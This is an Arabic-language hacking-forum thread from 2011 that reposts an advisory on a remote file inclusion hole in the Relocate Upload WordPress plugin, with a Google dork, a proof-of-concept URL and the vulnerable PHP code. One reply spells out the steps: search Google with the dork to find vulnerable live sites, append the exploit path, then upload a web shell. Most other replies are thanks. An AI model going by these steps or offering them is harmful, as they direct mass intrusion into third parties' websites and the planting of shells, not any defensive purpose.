التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-20-2011, 05:50 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

.......... ثغره في سكربت ورد برسس ريموت فايلن انكلود


السلام عليكم ورحمة الله وبركاته

اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات

شوفت ثغرات جديده كلها في الورد برسس

ومنها هذي الثغره

كود PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
 
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       
// WP setup and function access
        
define('WP_USE_THEMES'false);
        require_once(
urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter 
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي

بس يارب الثغره تعجبكم

تحياتي لكم


eyvi td s;vfj ,v] fvss vdl,j thdgk hk;g,]

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 09-20-2011, 06:26 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






أبو محسن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أبو محسن is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


مشكوور اخوي وااااصل


تحياااتي لك

   

رد مع اقتباس
قديم 09-20-2011, 06:03 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


اقتباس
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي

^^

http://www.vbspiders.com/vb/f283.html

تابعها

   

رد مع اقتباس
قديم 09-20-2011, 06:10 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية inox team
 

 

 
إحصائية العضو







inox team غير متواجد حالياً

إرسال رسالة عبر MSN إلى inox team إرسال رسالة عبر Skype إلى inox team

 

 

إحصائية الترشيح

عدد النقاط : 10
inox team is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


   

رد مع اقتباس
قديم 09-20-2011, 06:30 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Mad-Hacker
 

 

 
إحصائية العضو







Mad-Hacker غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mad-Hacker

 

 

إحصائية الترشيح

عدد النقاط : 10
Mad-Hacker is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


تصحيح
هذه ثغرة ليست في سكربت وردبرس انما , في اضافة - Plugins تضاف الى سكربت وردبرس .
وهناك فرق كبير جدا , لان في هذه الاضافة في اغلب الاحيان ليست من برمجة " وردبرس " , يعني لا علاقة لوردبرس بالخطىء البرمجي .

بالنسبة للاستغلال سهل جدا وان شاء الله تجد مواقع مصابة , شوف كيف

اولا ابحث في Google عن مواقع مصابة باستخدام هذا الدورك

inurl:wp-content/plugins/relocate-upload

رح يظهرك العديد من المواقع , اختر واحد منهم وادخل عليه , وازل من الرابط هذه ..

wp-content/plugins/relocate-upload

وحط مكانها
/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

وارفع شلك


Mad Hacker





   

رد مع اقتباس
قديم 09-20-2011, 06:35 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


صح ^^ اغلب التغرات يلي بيكتشفوها الان في الورد بريس موجوده فقط في الاضافات

   

رد مع اقتباس
قديم 09-20-2011, 06:47 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية inox team
 

 

 
إحصائية العضو







inox team غير متواجد حالياً

إرسال رسالة عبر MSN إلى inox team إرسال رسالة عبر Skype إلى inox team

 

 

إحصائية الترشيح

عدد النقاط : 10
inox team is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


صح و مشكور يا med haker

   

رد مع اقتباس
قديم 09-20-2011, 08:02 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Gx1Sniper
 

 

 
إحصائية العضو








Gx1Sniper غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Gx1Sniper is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


يعطيكم العافية

التوقيع

تم تغيير الاسم من الليث الاسود الى Gx1Sniper

للمراسلة والتواصل

Gx1@hotmail.com

 

   

رد مع اقتباس
قديم 09-24-2011, 07:06 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية EG-HaCKeR
 

 

 
إحصائية العضو






EG-HaCKeR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
EG-HaCKeR is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


الله يعطيكـ الف عافيه

   

رد مع اقتباس
قديم 09-25-2011, 01:03 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو





راعي الحما غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
راعي الحما is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


جزاك الله الخير

مبدع

   

رد مع اقتباس
قديم 09-25-2011, 12:47 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Mad-Hacker
 

 

 
إحصائية العضو







Mad-Hacker غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mad-Hacker

 

 

إحصائية الترشيح

عدد النقاط : 10
Mad-Hacker is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


تحياتي لكم شباب

   

رد مع اقتباس
قديم 09-25-2011, 04:02 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.MwNs
 

 

 
إحصائية العضو






Dr.MwNs غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.MwNs is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


مشكور حبيبي على الثغره ^^

ننتظر جديدك

التوقيع

http://www10.0zz0.com/2011/09/22/13/229601765.jpg

~> Dr.MwNs
~> Dr.MwNs
~> Dr.MwNs
~> Dr.MwNs

غبت ..

ولكن !

رجعت أقوى ^_^

ترقبوا ..
|| لعيون الـ ع ـنآكب ||


xc_t@hotmail.com
www.vbspiders.com

 

   

رد مع اقتباس
قديم 09-27-2011, 10:17 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.MeRo
 

 

 
إحصائية العضو





Mr.MeRo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.MeRo is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


قويه يا غالي

   

رد مع اقتباس
قديم 10-07-2011, 10:02 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية s3c
 

 

 
إحصائية العضو





s3c غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
s3c is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


يعطييييك العاااااافيه شكراا%%

   

رد مع اقتباس
قديم 10-08-2011, 04:03 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 

 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


مشكورين على الثغره ^^

التوقيع

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:57 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0